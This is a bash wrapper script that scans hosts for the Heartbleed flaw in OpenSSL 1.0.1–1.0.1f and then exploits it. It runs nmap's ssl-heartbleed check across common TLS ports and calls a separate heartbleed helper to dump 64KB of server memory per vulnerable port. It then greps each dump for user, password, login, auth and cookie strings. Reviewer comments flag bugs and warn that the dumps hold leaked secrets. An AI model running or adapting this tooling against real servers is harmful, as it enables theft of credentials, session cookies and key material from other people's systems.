# Heartbleed
#Affected OpenSSL versions
#The affected versions of OpenSSL are OpenSSL 1.0.1 through 1.0.1f (inclusive).
#Later versions (1.0.1g and later) and previous versions (1.0.0 branch and older) are not vulnerable.
#Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.
# Scan and exploit
# ./hbse 127.0.0.1 # Interactive mode.
# ./hbse --scan 127.0.0.1 # No interactive mode. Scan only.
# ./hbse --exploit 127.0.0.1 # No interactive mode. Scan and exploit.
# cat hbse
#!/bin/bash
#
# hbse - Heartbleed scan/exploit wrapper.
#
# Usage:   ./hbse [--scan|--exploit] <ip>
# Requires: nmap with the ssl-heartbleed NSE script, a ./heartbleed helper
#           binary in the current directory (not part of this file), and
#           strings/hexdump/less for the interactive inspection steps.
#
# NOTE(review): no `set -eu`, no `read -r`, and most expansions below are
# unquoted. `$ip` comes straight from argv and is interpolated unquoted into
# nmap/heartbleed command lines and a final `rm -f $ip.*`; anything other than a
# plain address (spaces, globs) will be word-split, so treat argv as untrusted
# if this script is ever driven by another tool.
#
# NOTE(review): every output file `$ip.$port` written below holds raw memory
# read back from the target and may contain credentials, cookies or key
# material. It is created in the cwd with the default umask and is only
# deleted on an interactive prompt; treat these files as sensitive and treat
# anything they reveal as compromised (remediation is the upgrade/rebuild
# described in the header above, plus rotating whatever was exposed).
#
### TCP ####
# 443 (HTTPS - HTTP over SSL)
# 465 (SMTPS - SMTP over SSL)
# 563 (NNTPS - NNTP over TLS/SSL)
# 636 (LDAPS - LDAP over TLS/SSL)
# 989 (FTPS Data - FTP Data over TLS/SSL)
# 990 (FTPS Control - FTP Control over TLS/SSL)
# 992 (Telnet over TLS/SSL)
# 993 (IMAPS - IMAP over SSL)
# 995 (POP3S - POP3 over SSL)
# 1194 (OpenVPN)
# 2484 (Oracle Database listening for SSL client)
# 5061 (SIP over TLS)
# 8443 (Apache Tomcat SSL)
### UDP ###
# 563 (NNTPS - NNTP over TLS/SSL)
# 636 (LDAPS - LDAP over TLS/SSL)
# 4433 (OpenSSL)

# Argument handling: one arg = target ip (interactive); two args = mode flag
# then ip. Any other count exits silently with status 0. A two-arg call whose
# first word is not --scan/--exploit falls through to interactive mode below.
if [ $# -eq 1 ]; then
  ip="$1"
elif [ $# -eq 2 ]; then
  se="$1"
  ip="$2"
else
  exit
fi

# Port list handed to nmap -p. NOTE(review): nmap only probes the U: ports
# when run with -sU, which this script never passes, so the UDP part is
# presumably ignored (nmap warns about it) — confirm if UDP coverage matters.
nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"

#######################################
# Print text in an ANSI colour.
# Globals:   header, tail (written; both are globals, not locals)
# Arguments: $1 - text, passed to `echo -e`, so \n escapes are expanded
#            $2 - colour name: gray, red, green or yellow
# Outputs:   the coloured text on stdout, no trailing newline (-n)
#######################################
function print() {
  text="$1"
  color="$2"
  if [ "$color" == "gray" ]; then
    header="\e[38;5;250m"
  elif [ "$color" == "red" ]; then
    header="\e[91m"
  elif [ "$color" == "green" ]; then
    header="\e[92m"
  elif [ "$color" == "yellow" ]; then
    header="\e[93m"
  fi
  # No else branch: an unknown colour reuses whatever `header` held from the
  # previous call (empty on the first call).
  tail="\e[0m"
  # Unquoted on purpose? The text is word-split and glob-expanded here, so
  # runs of spaces collapse and a literal `*` in leaked data would glob the
  # cwd. `printf '%b%s%b' "$header" "$text" "$tail"` would avoid that.
  echo -en $header$text$tail
}

# Step 1: probe port 443 only. Any line containing "VULNERABLE" counts as a
# hit; a "NOT VULNERABLE" line would match too — confirm the NSE script's
# output format before relying on this for anything but a quick check.
print "Checking if $ip is vulnerable on port 443... " "gray"
vulnerable="`nmap -p T:443 -script ssl-heartbleed $ip | grep VULNERABLE`"
if [ "$vulnerable" != "" ]; then
  print "Yes\n" "green"
  # NOTE(review): this prompt carries a literal line break inside the quotes
  # where every other prompt uses \n; `echo -e` prints a newline either way.
  print "Checking if it is vulnerable on other ports... 
" "gray"
  # Step 2: rescan the full port list and scrape the port numbers out of
  # nmap's human-readable output (the "NNN/tcp open" line two lines above each
  # "VULNERABLE:" marker). Screen-scraping is fragile; nmap's -oG/-oX output
  # would be a more stable thing to parse.
  vports="`nmap -p $nports -script ssl-heartbleed $ip | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}'`"
  # BUG(review): `$ports` is never assigned anywhere in this script (the
  # variables are `nports` and `vports`), so `echo ""` yields one line and
  # `n` is always 1: the "No" branch and the singular wording are taken even
  # when several ports were found. The intended expression is presumably
  # `echo "$vports" | wc -l`.
  n="`echo "$ports" | wc -l`"
  if [ "$n" == 1 ]; then
    print "No\n" "red"
    w1="port"
    w2="it"
    w3="file"
  else
    print "Yes\n" "green"
    w1="ports"
    w2="them"
    w3="files"
  fi
  print "Vulnerable $w1:\n" "gray"
  print "$vports\n" "green"
  # Mode dispatch: --scan stops here, --exploit auto-answers the prompt,
  # anything else asks. Only an exact uppercase "Y" proceeds (see the test
  # below); "y", "yes" or Enter all decline.
  if [ "$se" == "--scan" ]; then
    exit
  elif [ "$se" == "--exploit" ]; then
    answer="Y"
  else
    print "Do you want to exploit $w2? [Yn] " "gray"
    read answer
  fi
  if [ "$answer" = "Y" ]; then
    print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
    # Port list is served on fd 3 so that the interactive `read answer`
    # inside the loop can still read the user's reply from stdin.
    exec 3<<< "$vports"
    while read port <&3; do
      print "+ Port [$port]\n" "gray"
      # One dump file per target/port pair in the cwd; an earlier dump for
      # the same pair is removed first.
      ofile="$ip.$port"
      if [ -f $ofile ]; then rm -f $ofile; fi
      # Per-port extra flag for the helper. NOTE(review): presumably `-c`
      # selects a STARTTLS flavour for the mail ports (465/993/995) — confirm
      # against the ./heartbleed helper's usage text, which is not on this page.
      if [ "$port" == "465" ]; then
        precmd='-c 0'
      elif [ "$port" == "993" ]; then
        precmd='-c 2'
      elif [ "$port" == "995" ]; then
        precmd='-c 1'
      else
        precmd=''
      fi
      # All helper output is discarded, so the only failure signal is the
      # absence of the output file checked just below.
      ./heartbleed -s $ip -p $port -f $ofile $precmd -t 1 > /dev/null 2>&1
      if [ -f $ofile ]; then
        # Quick keyword triage of printable strings in the dump. Anything
        # shown here has already left the target and must be handled as a
        # leaked secret, not just a finding.
        r="`strings $ofile | grep -i -e user -e pass -e login -e auth -e cookie -e basic`"
        print "$r\n" "green"
        if [ "$se" != "--exploit" ]; then
          print "Do you want to less the hexdump file? [Yn] " "gray"
          read answer
          if [ "$answer" = "Y" ]; then
            hexdump -C $ofile | less
          fi
        fi
      else
        print "Error: heartbleed did not work on port $port...\n" "yellow"
      fi
    done
    # Cleanup is interactive only; with --exploit the dump files are left
    # behind in the cwd. `$ip.*` is an unquoted glob, so it also matches any
    # other file in the cwd whose name starts with the ip and a dot.
    if [ "$se" != "--exploit" ]; then
      print "Do you want to delete the hexdump $w3? [Yn] " "gray"
      read answer
      if [ "$answer" = "Y" ]; then
        rm -f $ip.*
      fi
    fi
  fi
else
  print "No\n" "red"
fi